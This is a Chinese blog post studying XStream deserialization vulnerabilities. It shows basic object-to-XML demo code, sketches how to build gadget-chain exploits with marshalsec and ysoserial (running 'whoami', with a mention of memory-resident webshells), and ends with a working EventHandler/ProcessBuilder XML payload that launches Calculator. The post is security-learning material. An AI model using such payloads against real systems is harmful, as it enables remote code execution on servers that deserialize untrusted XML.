xstream 相关漏洞学习

最新推荐文章于 2023-11-27 09:26:58 发布

Adsatrtgo

最新推荐文章于 2023-11-27 09:26:58 发布

阅读量422

点赞数

分类专栏：开发学习文章标签： XStream反序列化漏洞 java

本文链接：https://blog.csdn.net/qq_38376348/article/details/117355657

版权

开发学习专栏收录该内容

30 篇文章 1 订阅

订阅专栏

参考：

https://www.bbsmax.com/A/kmzLWkWBdG/ 基本使用

https://blog.csdn.net/wenrennaoda/article/details/105564606 各版本漏洞触发原理

https://zhuanlan.zhihu.com/p/375239304

基本使用

xstream主要作用：类与XML互相转换

引入依赖

    <dependencies>
        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.10</version>
        </dependency>
    </dependencies>

创建Student类

import java.io.Serializable;

public class Student implements Serializable {

    private int id;
    private String name;
    private String school;

    public Student() {
        // TODO Auto-generated constructor stub
    }
    public Student(int id, String name, String school) {
        super();
        this.id = id;
        this.name = name;
        this.school = school;
    }

    public int getId() {
        return id;
    }
    public void setId(int id) {
        this.id = id;
    }
    public String getName() {
        return name;
    }
    public void setName(String name) {
        this.name = name;
    }
    public String getSchool() {
        return school;
    }
    public void setSchool(String school) {
        this.school = school;
    }

    @Override
    public String toString() {
        return "Student [id=" + id + ", name=" + name + ", school=" + school + "]";
    }

}

测试SerializeXml类：数组类与XML互转

package com.ser.test;


import com.thoughtworks.xstream.XStream;

import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;

public class SerializeXml {
    public static void main(String[] args) {
        serializeToXml();
        System.out.println("**************************************");
        deserialize();
    }

    public static void serializeToXml() {
        FileOutputStream write = null;
        Student stu1 = new Student(10003, "claire", "hh");
        Student stu2 = new Student(10004, "leafly", "niubi");

        Student[] students = {stu1,stu2};
        XStream xstream = new XStream();
        try {
//将文流怼到文件上
            write = new FileOutputStream("myObjtoXml.txt");
//将学生对象序列化成Xml并通过流写入到文件中
            xstream.toXML(students, write);
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        }
        //将序列化结果输出
        System.out.println(xstream.toXML(students));

    }

    public static void deserialize() {
        FileInputStream reader;
        XStream xstream = new XStream();

        Student[] students=null;
        try {
            reader = new FileInputStream ("myObjtoXml.txt");
            //将Xml文件反序列化为Student对象
            students=(Student[])xstream.fromXML(reader);
            if (students != null) {
                for (Student student : students) {
                    System.out.println(student);
                }
            }

        } catch (FileNotFoundException e) {

            e.printStackTrace();
        }

    }
}

运行后生成XML文件

<com.ser.test.Student-array>
  <com.ser.test.Student>
    <id>10003</id>
    <name>claire</name>
    <school>hh</school>
  </com.ser.test.Student>
  <com.ser.test.Student>
    <id>10004</id>
    <name>leafly</name>
    <school>niubi</school>
  </com.ser.test.Student>
</com.ser.test.Student-array>

测试SerializeXml类：单个类与XML互转

package com.ser.test;


import com.thoughtworks.xstream.XStream;

import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;

public class SerializeXml {
    public static void main(String[] args) {
        serializeToXml();
        System.out.println("**************************************");
        deserialize();
    }
    public static void serializeToXml() {
        FileOutputStream write = null;
        Student stu1 = new Student(10003, "claire", "hh");
;
        XStream xstream = new XStream();
        try {
//将文流怼到文件上
            write = new FileOutputStream("myObjtoXml.txt");
//将学生对象序列化成Xml并通过流写入到文件中
            xstream.toXML(stu1, write);
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        }
        //将序列化结果输出
        System.out.println(xstream.toXML(stu1));

    }
    public static void deserialize() {
        FileInputStream reader;
        XStream xstream = new XStream();
        try {
            reader = new FileInputStream ("myObjtoXml.txt");
            Student stu1=(Student)xstream.fromXML(reader);
            System.out.println(stu1);
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        }

    }
}

生成XML如下：

<com.ser.test.Student>
  <id>10003</id>
  <name>claire</name>
  <school>hh</school>
</com.ser.test.Student>

探测URLDNSLOG

POC生成

IDEA导入marshalsec项目,将ysoserial引入依赖

找到想修改的gadgets，这里以CommonsBeanutils为例子

注释掉原有的生object的逻辑，替换成调用ys的逻辑

直接保存，注释掉源代码中serializeToXml，直接反序列化，尝试解析

生成依赖于CommonsBeanutils1直接执行命令的exp

如下，因为这里不需要借助ldap远程加载，所以顺者ys的exp生成逻辑写一遍代码，如目标的gadgets的CommonsBeanutils1，执行whoami等，如果需要注入内存马，则替换对ys的模块

其他EXP

基于EventHandler，版本要求：1.4.10 1.4.6 1.4.5

<sorted-set>
<string>foo</string>
<dynamic-proxy>
    <interface>java.lang.Comparable</interface>
    <handler class="java.beans.EventHandler">
        <target class="java.lang.ProcessBuilder">
            <command>
                <string>open</string>
                <string>/System/Applications/Calculator.app</string>
            </command>
        </target>
        <action>start</action>
    </handler>
</dynamic-proxy>
</sorted-set>

Adsatrtgo

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
2
评论
xstream 相关漏洞学习

参考：https://www.bbsmax.com/A/kmzLWkWBdG/基本使用xstream主要作用：类与XML互相转换引入依赖 <dependencies> <dependency> <groupId>com.thoughtworks.xstream</groupId> <artifactId>xstream</artifactId>
复制链接

扫一扫

专栏目录